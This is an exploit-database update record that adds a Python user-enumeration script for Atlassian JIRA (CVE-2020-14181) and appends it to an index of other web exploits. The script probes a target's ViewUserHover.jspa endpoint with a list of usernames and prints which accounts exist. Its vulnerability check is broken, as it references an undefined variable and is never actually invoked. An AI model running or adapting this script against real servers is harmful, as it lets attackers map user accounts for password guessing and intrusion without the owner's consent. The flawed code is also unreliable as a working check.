DB: 2021-03-11

1 changes to exploits/shellcodes

Atlassian JIRA 8.11.1 - User Enumeration

exploits/multiple/webapps/49633.py

@@ -0,0 +1,45 @@
+# Title: Atlassian JIRA 8.11.1 - User Enumeration
+# Author: Dolev Farhi
+# Vulnerable versions: version < 7.13.16,  8.0.0 ≤ version < 8.5.7, 8.6.0 ≤ version < 8.12.0
+# CVE: CVE-2020-14181
+# Credit to original CVE author: Mikhail Klyuchnikov of Positive Technologies.
+
+import sys
+import os
+import requests
+
+def help():
+    print('python3 script.py <target> <usernames_file>')
+    print('e.g. python3 script.py https://jiratarget.com usernames.txt')
+    sys.exit()
+
+if len(sys.argv) < 3:
+  help()
+
+server = sys.argv[1]
+usernames = sys.argv[2]
+
+random_user = '0x00001'
+
+try:
+  os.path.exists(usernames)
+except:
+  print(usernames, 'file does not exist.')
+  sys.exit(1)
+
+def test_vulnerable():
+  resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
+  if 'User does not exist: {}'.format(random_user) in resp.text:
+    return True
+  return False
+
+if test_vulnerable is False:
+  print('server is not vulnerable.')
+  sys.exit(1)
+
+f = open(usernames, 'r').read()
+
+for username in f.splitlines():
+  resp = requests.get('{}/secure/ViewUserHover.jspa?username={}'.format(server, username))
+  if 'User does not exist' not in resp.text:
+    print('EXISTS', username)

files_exploits.csv

@@ -43819,3 +43819,4 @@ id,file,description,date,author,type,platform,port
 49625,exploits/php/webapps/49625.py,"Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-08,"Christian Vierschilling",webapps,php,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,
 49628,exploits/php/webapps/49628.txt,"GLPI 9.5.3 - 'fromtype' Unsafe Reflection",2021-03-08,"Vadym Soroka",webapps,php,
+49633,exploits/multiple/webapps/49633.py,"Atlassian JIRA 8.11.1 - User Enumeration",2021-03-10,"Dolev Farhi",webapps,multiple,